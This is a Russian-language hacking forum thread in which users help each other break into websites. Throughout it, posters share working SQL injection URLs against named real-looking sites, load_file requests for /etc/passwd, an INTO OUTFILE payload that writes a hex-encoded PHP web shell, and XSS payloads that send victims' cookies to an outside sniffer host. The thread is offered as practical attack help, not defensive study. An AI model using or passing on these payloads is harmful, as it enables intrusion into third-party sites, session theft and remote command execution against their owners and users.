2pingvincible Это означает что else испаользуется в коде без if ни чего ты запросами вида http://site.com/?cat=4-1 не сможешь сделать
Один очень интересный мне сайт имеет багу, инъекция слепая. кавычки: 1) слешируются 2) подстановка кавычек обрабатывается и выдает пустую страницу. http://site.ru/index.php?act=18/**/union/**/select/**/concat_ws(0x3a,table_name)/**/from/**/information_schema.tables/**/limit/**/0,1-- всего одна таблица. надо вытащить её название и после колонок в ней. http://site.ru/index.php?act=25+AND+ascii(lower(substring(user(),1,1)))=97-- юзера, систем_юзера подобрал. версия мускль 5. http://site.ru/index.php?act=25+union+select+load_file(0x2F6574632F706173737764)-- особо интересно получить содержимое файла /etc/paswd. или на крайний случай выжать максимально информации. За помощь + обеспечен -)
я в хсс чайник пока полный. Вот есть пассивная хсс вот я щелкаю по ссылке у меня доходит до странички с хсс а можно сделать так чтобы он после поподания на эту страничку переходил на другую например показывал какую нибудь картинку.
Я тож в хсс не особо шарю....но там вродь нада составить скрипт который перекидует выполнять то что те нужно и вставить его в уязвимое поле... P.S.:Если чтот не так написал просьба сильно не пинать...)
да. js примерно следующего содержания <script> document.location.href="http://yandex.ru"; </script> оно тебя перенаправит сам понимаешь куда))
что не получается.У меня такого плана index js в индексе пишу так <script>document.location.href="ТУТ у меня хсс "</script> а в js img = new Image(); img.src = "http://na-s.ru/images/S0ulVortex_1.gif?"+document.cookie; Я эту систему взял из видео где показывают хсс yandex Может у кого есть другая система похожая на эту только чтобы после того как куки крадет кидала на какуюнють картинку или сайт
код чтобы перенаправить на сниффер + кук http://site.ru/index.php?xss='><script>document.location.href='your_site/sniffer.php?cookie='+document.cookie;</script>
Добрый день Как реализовать атаку SQL Injection в среде Interbase (Firebird)? Code: Warning: ibase_query(): Dynamic SQL Error SQL error code = -104 Token unknown - line 1, char 78 UNION in Firebird.php Поддерживает ли Interbase установку UNION? Был ли кого у опыт проведения атаки используя данную технологию? Спасибо.
http://www.nkzu.kz/new1/site_news.asp?id=123' Microsoft JET Database Engine error '80040e14' говорят не инжектится, но мне давным давно кто-то показал что таки извлеч инфу можно. Извлекали из табля news. Есть идеи как эту скулу раскрутить?
Parti, да в ibase можно объединять запросы оператором union; sql-inj хз смотря как построен запрос - попробуй perl-утилиту isr-sqlget truelamer, _http://forum.antichat.ru/thread50550.html
Есть сайт, на нём бажный скрипт script.php?id=-1+union+select+1,2,3,4,5,load_file(0x2F6574632F706173737764),7,8,9,10/* выдаёт содержимое etc\passwd .. как мне шелл залить теперь?
Кто говорит? Просто это Access, и всё немного подругому, если хочешь подбирай таблицы и поля: http://www.nkzu.kz/new1/site_news.asp?id=240+union+select+1,2,3,4,5,6+from+tblnews попугай Вчера расписывал ответ на такой-же вопрос: https://forum.antichat.ru/showpost.php?p=942609&postcount=34
попугай script.php?id=-1+union+select+1,2,3,4,5,0x3c3f2073797374656d28245f4745545b27636d64275d293b203f3e,7,8,9,10+from+table_name+into+outfile+'/var/www/html/tmp/shell_name.php'/* Где /var/www/html/tmp/ -путь к директории, доступной на запись (ковыряй, ищи), table_name имя любой таблицы,shell_name.php имя шелла (главное, чтоб в этой директории не было такого же =) ), а 0x3c3f2073797374656d28245f4745545b27636d64275d293b203f3e -это захексенное '<?system($_GET[cmd]);?>', главное, чтобы кавычки прокатывали. UPD Не успел, ответили раньше =)
l1ght А если вручную? Какая последовательность действий для инъекции в Interbase? SQL Инъеция после WHERE SELECT * WHERE ID=[SQL INJ]
почему когда я отправляю запрос www.grog-ink.com/detail.asp?ID=1 or 1=@@version-- мне выводит: А не нужные мне параметры? Запрос по сути верный..
